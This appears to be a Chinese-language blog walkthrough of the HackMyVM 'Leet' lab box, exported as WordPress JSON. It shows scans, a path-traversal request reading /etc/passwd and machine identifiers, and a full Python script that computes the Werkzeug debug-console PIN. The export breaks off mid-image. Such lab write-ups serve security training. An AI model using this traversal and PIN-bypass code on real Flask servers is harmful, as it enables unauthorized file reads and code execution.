{"id":711,"date":"2024-07-01T19:13:02","date_gmt":"2024-07-01T11:13:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=711"},"modified":"2024-07-09T11:50:01","modified_gmt":"2024-07-09T03:50:01","slug":"hmv-_-leet","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/711\/07\/01\/2024\/","title":{"rendered":"hmv[-_-]Leet"},"content":{"rendered":"<h1>Leet<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911415.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911415.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701145522686\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911417.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911417.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152011662\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ rustscan -a 192.168.0.197 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.197:22\nOpen 192.168.0.197:7777\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e1:5d:7c:b7:07:92:17:dc:46:76:7d:be:a9:50:43:d2 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO40ZPJ7m6D4U6cVDKC0tpGfvjWc4qisOha\/4Lw8EEp8kxB8aDZMMiVoZwc8s+H60NNwTUBsp9iZc\/8ZgrPlgn8=\n|   256 a0:f3:b3:86:93:f5:58:82:88:dd:e5:10:db:35:de:62 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJt60Bt5N10kc53Nwgf1AM9fZ+78Y0MS7Yq8tYoL7r8i\n7777\/tcp open  http    syn-ack Werkzeug httpd 3.0.1 (Python 3.11.2)\n| http-methods: \n|_  Supported Methods: GET HEAD OPTIONS POST\n|_http-server-header: Werkzeug\/3.0.1 Python\/3.11.2\n|_http-title: Site doesn&#039;t have a title (text\/html; charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.197:7777\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.197:7777\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/download             (Status: 500) [Size: 14478]\nProgress: 19456 \/ 1323366 (1.47%)[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756.zip&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.197:7777\/1756.bak&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)<\/code><\/pre>\n<p>\u770b\u6765\u626b\u4e0d\u4e86<\/p>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ nikto -h http:\/\/192.168.0.197:7777\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n---------------------------------------------------------------------------\n+ 0 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u670d\u52a1\u63a2\u6d4b<\/h3>\n<p>\u5c1d\u8bd5\u641c\u5bfbopenssh\u6f0f\u6d1e\uff0c\u4f46\u662f\u6ca1\u6709\u6536\u83b7\uff0c\u5c1d\u8bd5\u63a2\u6d4b<code>7777<\/code>\u7aef\u53e3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911419.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911419.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152412099\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u5565\u4e1c\u897f\uff0c\u770b\u4e00\u4e0b\u6e90\u7801\uff0c\u4e5f\u6ca1\u53d1\u73b0\u5565\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\u8fd9\u4e2a\u8f93\u5165\u6846\uff0c\u8f93\u5165<code>whoami<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911420.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911420.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152510282\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u641c\u7d22\uff0c\u627e\u5230\u4e00\u4e2a<a href=\"https:\/\/www.robertecker.com\/hp\/research\/leet-converter.php?lang=en\">\u7f51\u7ad9<\/a>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911421.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911421.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701152944331\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8be2\u95ee\u4e00\u4e0bgpt\uff1a<\/p>\n<blockquote>\n<p>\u4f60\u63d0\u5230\u7684 &quot;L33T converter&quot; \u901a\u5e38\u6307\u7684\u662f\u4e00\u4e2a\u5c06\u6587\u672c\u8f6c\u6362\u4e3a\u6240\u8c13\u7684 &quot;leet speak&quot; \u6216 &quot;1337 speak&quot; \u7684\u5de5\u5177\u3002\u8fd9\u79cd\u8bed\u8a00\u8f6c\u6362\u662f\u4e00\u79cd\u5c06\u5b57\u6bcd\u66ff\u6362\u4e3a\u770b\u8d77\u6765\u7c7b\u4f3c\u7684\u6570\u5b57\u6216\u7b26\u53f7\u7684\u4fda\u8bed\u5f62\u5f0f\uff0c\u5e38\u89c1\u4e8e\u7f51\u7edc\u6587\u5316\uff0c\u7279\u522b\u662f\u65e9\u671f\u7684\u9ed1\u5ba2\u548c\u6781\u5ba2\u793e\u533a\u3002<\/p>\n<p>\u5728\u4f60\u7ed9\u51fa\u7684\u4f8b\u5b50\u4e2d\uff1a<\/p>\n<ul>\n<li>\u8f93\u5165\uff1a<code>whoami<\/code><\/li>\n<li>\u8f93\u51fa\uff1a<code>wh04m1<\/code><\/li>\n<\/ul>\n<p>\u8fd9\u91cc\u7684\u8f6c\u6362\u89c4\u5219\u5927\u81f4\u5982\u4e0b\uff1a<\/p>\n<ul>\n<li><code>o<\/code> \u88ab\u66ff\u6362\u4e3a <code>0<\/code>\uff08\u56e0\u4e3a\u4e24\u8005\u5728\u89c6\u89c9\u4e0a\u76f8\u4f3c\uff09<\/li>\n<li><code>a<\/code> \u88ab\u66ff\u6362\u4e3a <code>4<\/code>\uff08\u56e0\u4e3a <code>a<\/code> \u5728\u67d0\u4e9b\u5b57\u4f53\u4e2d\u7c7b\u4f3c\u4e8e\u5012\u8fc7\u6765\u7684 <code>4<\/code>\uff09<\/li>\n<li><code>i<\/code> \u88ab\u66ff\u6362\u4e3a <code>1<\/code>\uff08\u56e0\u4e3a\u4e24\u8005\u5728\u89c6\u89c9\u4e0a\u76f8\u4f3c\uff09<\/li>\n<\/ul>\n<p>\u8fd9\u79cd\u8f6c\u6362\u7684\u4e3b\u8981\u76ee\u7684\u662f\u5728\u804a\u5929\u6216\u8bba\u575b\u4e2d\u9690\u85cf\u6d88\u606f\u7684\u771f\u5b9e\u542b\u4e49\uff0c\u4f7f\u5176\u5bf9\u4e0d\u719f\u6089\u8fd9\u79cd\u8bed\u8a00\u7684\u4eba\u6765\u8bf4\u4e0d\u90a3\u4e48\u660e\u663e\u3002\u7136\u800c\uff0c\u8fd9\u4e5f\u53ef\u80fd\u88ab\u7528\u4e8e\u6076\u610f\u76ee\u7684\uff0c\u4f8b\u5982\u6df7\u6dc6\u6216\u9690\u85cf\u6076\u610f\u547d\u4ee4\u6216\u4fe1\u606f\u3002<\/p>\n<\/blockquote>\n<h3>\u6587\u4ef6\u5305\u542b<\/h3>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u90a3\u4e2a\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911422.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911422.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701162147041\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>flask \u6846\u67b6\u53ef\u80fd\u5f00\u542f\u4e86\u8c03\u8bd5\u6a21\u5f0f\uff0c\u770b\u5230console\u786e\u5b9e\u662f\u5b58\u5728\u7684\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911423.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911423.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701162225439\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u88ab\u9501\u4f4f\u4e86\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u76ee\u5f55\uff0c\u53d1\u73b0\u4e0b\u8f7d\u5730\u5740\u4e3a\uff1a<code>http:\/\/192.168.0.197:7777\/download?filename=converted_text.txt<\/code><\/p>\n<p>\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.197:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<p>\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u8bfb\u53d6\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nriva:x:1000:1000:,,,:\/home\/riva:\/bin\/bash<\/code><\/pre>\n<h3>\u8ba1\u7b97pin<\/h3>\n<p>\u5c1d\u8bd5\u8ba1\u7b97pin\uff0c\u53ef\u4ee5\u53c2\u8003<code>https:\/\/github.com\/wdahlenburg\/werkzeug-debug-console-bypass<\/code>\uff1a<\/p>\n<pre><code class=\"language-python\"># get_pin.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;riva&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    &#039;\/opt\/project\/venv\/lib\/python3.11\/site-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;8796756626246&#039;,\n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;\n]\n\nh = hashlib.sha1() # or hashlib.md5()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n#h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv =None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>\u8fdb\u884c\u6539\u5199\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ python                                                                                            \nPython 3.11.8 (main, Feb  7 2024, 21:52:08) [GCC 13.2.0] on linux\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n>&gt;&gt; 0x0800278dcb46\n8796756626246<\/code><\/pre>\n<p>\u7136\u540e\u8bfb\u53d6\u4e09\u4e2a\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\/etc\/machine-id\n# f6791f240ce6407ea271e86b78ac3bdb\n\/proc\/sys\/kernel\/random\/boot_id\n# \n\/proc\/self\/cgroup\n# <\/code><\/pre>\n<p>\u4f46\u662f\u6709\u7684\u8bfb\u4e0d\u5230\uff0c\u540e\u6765<code>ta0<\/code>\u795e\u544a\u8bc9\u6211windows\u8bfb\u4e0d\u51fa\u6765\uff0c\u4f46\u662fkali\u53ef\u4ee5\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u53d6\uff0c\u56e0\u4e3a\u524d\u9762\u770b\u4e86\u4e00\u4e0bhosts\u6587\u4ef6\u53d1\u73b0\u5b58\u5728\u57df\u540d\u89e3\u6790\uff0c\u5c1d\u8bd5\u8fdb\u884c\u914d\u7f6e\uff1a<\/p>\n<pre><code class=\"language-text\">127.0.0.1   localhost\n127.0.1.1   leet.hmv\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884ccurl\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ cat \/etc\/hosts \n127.0.0.1       localhost\n127.0.1.1       kali\n10.160.107.159  adria.hmv\n\n::1             localhost ip6-localhost ip6-loopback\nff02::1         ip6-allnodes\nff02::2         ip6-allrouters\n\n192.168.0.165   leet.hmv\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ curl http:\/\/leet.hmv:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n^C\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ wget http:\/\/leet.hmv:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n--2024-07-01 05:37:27--  http:\/\/leet.hmv:7777\/download?filename=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\nResolving leet.hmv (leet.hmv)... 192.168.0.165\nConnecting to leet.hmv (leet.hmv)|192.168.0.165|:7777... connected.\nHTTP request sent, awaiting response... ^C<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528kali\u7684\u6d4f\u89c8\u5668\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911424.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911424.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240701174356662\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4e5f\u662f\u7a7a\u7684\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u591a\u8bfb\u51e0\u6b21\uff0c\u7a81\u7136\u53c8\u597d\u4e86\uff08\u4e2d\u95f4\u90a3\u4e2a<code>boot_id<\/code>\u8bfb\u4e867\u6b21\uff0c\u867d\u7136\u6ca1\u5565\u7528\uff09\uff1a<\/p>\n<pre><code class=\"language-bash\">\/etc\/machine-id\n# f6791f240ce6407ea271e86b78ac3bdb\n\/proc\/sys\/kernel\/random\/boot_id\n# da68b9a7-336e-40df-879a-f38a6447bfe9\n\/proc\/self\/cgroup\n# 0::\/system.slice\/flaskapp.service<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u83b7\u53d6\u673a\u68b0\u7801\uff1a<\/p>\n<pre><code class=\"language-python\"># tools.py\nmachine_id = b&quot;&quot;\nfor filename in &quot;machine-id&quot;, &quot;boot_id&quot;:\n    try:\n        with open(filename, &quot;rb&quot;) as f:\n            value = f.readline().strip()\n    except OSError:\n        continue\n\n    if value:\n        machine_id += value\n        break\ntry:\n    with open(&quot;cgroup&quot;, &quot;rb&quot;) as f:\n        machine_id += f.readline().strip().rpartition(b&quot;\/&quot;)[2]\nexcept OSError:\n    pass\n\nprint(machine_id)<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ vim tools.py  \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ echo &quot;f6791f240ce6407ea271e86b78ac3bdb&quot; &gt; machine-id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ echo &quot;da68b9a7-336e-40df-879a-f38a6447bfe9&quot; &gt; boot_id\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ echo &quot;0::\/system.slice\/flaskapp.service&quot; &gt; cgroup    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ chmod +x tools.py                 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Leet]\n\u2514\u2500$ python3 tools.py \nb&#039;f6791f240ce6407ea271e86b78ac3bdbflaskapp.service&#039;<\/code><\/pre>\n<pre><code class=\"language-python\"># exp.py\nimport hashlib\nfrom itertools import chain\n\nprobably_public_bits = [\n    &#039;riva&#039;,\n    &#039;flask.app&#039;,\n    &#039;Flask&#039;,\n    &#039;\/opt\/project\/venv\/lib\/python3.11\/site-packages\/flask\/app.py&#039;\n]\n\nprivate_bits = [\n    &#039;8796760530867&#039;,\n    &#039;f6791f240ce6407ea271e86b78ac3bdbflaskapp.service&#039;\n]\n\nh = hashlib.sha1()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>\u8bd5\u4e86\u5f88\u4e45\u4e00\u76f4\u4e0d\u884c\uff0c\u7075\u673a\u4e00\u52a8<code>riva<\/code>\u6362\u6210\u4e86<code>www-data<\/code>\uff0c\u6210\u529f\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911425.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407011911425.png\" 